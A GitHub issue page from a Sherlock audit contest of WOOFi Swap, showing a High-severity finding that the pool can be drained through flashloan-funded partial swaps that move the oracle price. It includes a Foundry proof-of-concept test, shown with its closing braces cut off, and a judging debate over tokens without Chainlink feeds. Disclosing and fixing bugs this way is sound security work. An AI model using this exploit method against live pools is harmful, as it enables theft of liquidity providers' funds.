sherlock-audit / 2024-03-woofi-swap-judging

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mstpr-brainbot - Pool can be drained #68

Open sherlock-admin2 opened 4 months ago

sherlock-admin2 commented 4 months ago



Pool can be drained


The pool can be drained just as it was during the incident that occurred previously.

Vulnerability Detail

maxNotionalSwap and maxGamma and the new math formula do not prevent the pool being drainable. Same attack vector that happent previously is still applicable:

Flashloan 99989999999999999990000 (99_990) WOO Sell WOO partially (in 10 pieces) assuming maxGamma | maxNotionalSwap doesnt allow us to do it in one go Sell 20 USDC and get 199779801821639475527975 (199_779) WOO Repay flashloan, pocket the rest of the 100K WOO.

Coded PoC:

function test_Exploit() public {
        // Flashloan 99989999999999999990000 (99_990) WOO
        // Sell WOO partially (in 10 pieces) assuming maxGamma | maxNotionalSwap doesnt allow us to do it in one go
        // Sell 20 USDC and get 199779801821639475527975 (199_779) WOO
        // Repay flashloan, pocket the rest of the 100K WOO. 

        // Reference values: 
        // s = 0.1, p = 1, c = 0.0001 

        // bootstrap the pool 
        uint usdcAmount = 100_0000_0_0000000000000_000;
        deal(USDC, ADMIN, usdcAmount);
        deal(WOO, ADMIN, usdcAmount);
        deal(WETH, ADMIN, usdcAmount);
        IERC20(USDC).approve(address(pool), type(uint256).max);
        IERC20(WOO).approve(address(pool), type(uint256).max);
        IERC20(WETH).approve(address(pool), type(uint256).max);

        // fund mr TAPIR
        uint wooAmountForTapir = 9999 * 1e18 - 1000;
        deal(WOO, TAPIR, wooAmountForTapir * 10);
        IERC20(USDC).approve(address(router), type(uint256).max);
        IERC20(WOO).approve(address(router), type(uint256).max);
        IERC20(WETH).approve(address(router), type(uint256).max);

        // get the price before the swaps
        (uint128 price, ) = oracle.woPrice(WOO);
        console.log("Price before the swap", price);

        // here, we assume maxGamma and maxNotionalSwap can save us. However, due to how AMM behaves
        // partial swaps in same tx will also work and it will be even more profitable! 
        uint cumulative;
        for (uint i; i < 10; ++i) {
            cumulative += router.swap(WOO, USDC, wooAmountForTapir, 0, payable(TAPIR), TAPIR);

        // how much we bought and what's the final swap? 
        console.log("USDC bought after swaps", cumulative);
        (price, ) = oracle.woPrice(WOO);
        console.log("Price after swap", price);

        // sell 20 USDC, how much WOO we get? (199779801821639475527975)
        uint receivedWOO = router.swap(USDC, WOO, 20 * 1e6, 0, payable(TAPIR), TAPIR);
        console.log("Received WOO", receivedWOO); // 199779801821639475527975 (10x)
        console.log("Total WOO flashloaned", wooAmountForTapir * 10); // 99989999999999999990000

        // attack is succesfull 
        assertGe(receivedWOO, wooAmountForTapir * 10);


Code Snippet

Tool used

Manual Review


fb-alexcq commented 3 months ago

This extreme price-deviation case has already been handled by price check (against Chainlink) in our Wooracle's price function.

mstpr commented 3 months ago

@fb-alexcq correct, but some tokens like WOO does not have chainlink price feeds in other networks, in that case the attack is feasible

fb-alexcq commented 3 months ago

Thanks for the feedback.

We already decided to never support any token which are unavailable in Chainlink, right after we got exploited a month ago. And this is the only way to fix it; otherwise, the project cannot run again.

WangSecurity commented 3 months ago

The info about not using tokens that don't have Chainlink price feeds is not in README. Moreover, the README says any standard token. Therefore, aproppriate severity is High.

WangSecurity commented 3 months ago

I've consulted on this issue with the Head of Judging and decided to invalidate it, since such tokens wouln't be used. The README says "any" ERC20 token, therefore, it's expected tokens without the any weird traits will be used.

mstpr commented 3 months ago


Every ERC20 can be used, tokens that does not have a a chainlink price feed set is not considered as "weird" tokens as per Sherlock:

Also, the current scope of contracts indeed assumes that there can be tokens used that does not have chainlink price feeds

Additionally, the README does not states that tokens that have no chainlink oracle will not be used. Though, this would be contradictory anyways since the current code has an extra logic to handle tokens without the chainlink price feed.

Also, the deployed chains are as follows in README: Arbitrum, Optimism, Base, Avalanche, BSC, Polygon PoS, Mantle, Fantom, Polygon zkEVM, zkSync, Linea There are lots of tokens that does not have chainlink price feed and have very high liquidity on some of them. For example, the WOO token has no price feeds, SOL token doesn't have price feed in Linea, zkSyncEVM, MATIC token doesn't have price feed in Linea, Scroll, Base etc.

Considering how serious the issue is and the above, this issue should be definitely considered as a high issue.

sherlock-admin2 commented 3 months ago


Every ERC20 can be used, tokens that does not have a a chainlink price feed set is not considered as "weird" tokens as per Sherlock:

Also, the current scope of contracts indeed assumes that there can be tokens used that does not have chainlink price feeds

Additionally, the README does not states that tokens that have no chainlink oracle will not be used. Though, this would be contradictory anyways since the current code has an extra logic to handle tokens without the chainlink price feed.

Also, the deployed chains are as follows in README: Arbitrum, Optimism, Base, Avalanche, BSC, Polygon PoS, Mantle, Fantom, Polygon zkEVM, zkSync, Linea There are lots of tokens that does not have chainlink price feed and have very high liquidity on some of them. For example, the WOO token has no price feeds, SOL token doesn't have price feed in Linea, zkSyncEVM, MATIC token doesn't have price feed in Linea, Scroll, Base etc.

Considering how serious the issue is and the above, this issue should be definitely considered as a high issue.

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WangSecurity commented 3 months ago

Agree with everything that tapir says above, but want to note that I've consulted with the head of judging before making this decision. But, I agree that I may have phrased the problem not very clearly and will send what I've said to the head of judging about it.

My message: "in some issues the problem is that tokens don't have chainlink's price feed, but the sponsor says they will only use tokens with the feeds."

The head of judging said this doesn't sound like a vulnerability.

After that I also added: "oh, sorry, I missed for the first one, it allowed to drain the entire pool, but still it required to whitelist tokens without the price feed, which they didn't intend to do." and head of judging is reacted with a thumbs up emoji.

I don't say that tapir is wrong and agree with his reasons, therefore, I will accept it decision from the head of judging. Just wanted to note why it's invalidated.

Czar102 commented 3 months ago

I think the fact that there are special fragments of code to handle the no oracle cases is a game-changer in this judgment. Without that detail, this would clearly be an admin misconfiguration, but it seems that tokens without a Chainlink feed were intended (or allowed) to be used.

Given that it wasn't noted anywhere (to my best knowledge) that this fragment of the code will never be used, i.e. all whitelisted tokens will have a Chainlink feed, I am planning to consider this a valid High severity issue.

WangSecurity commented 3 months ago

Great issue @mstpr !

Czar102 commented 3 months ago

Result: High Unique

sherlock-admin3 commented 3 months ago

Escalations have been resolved successfully!

Escalation status:

sherlock-admin3 commented 3 months ago

The protocol team fixed this issue in the following PRs/commits:

sherlock-admin2 commented 2 months ago

The Lead Senior Watson signed off on the fix.

fb-alexcq commented 2 months ago

Fixes merged: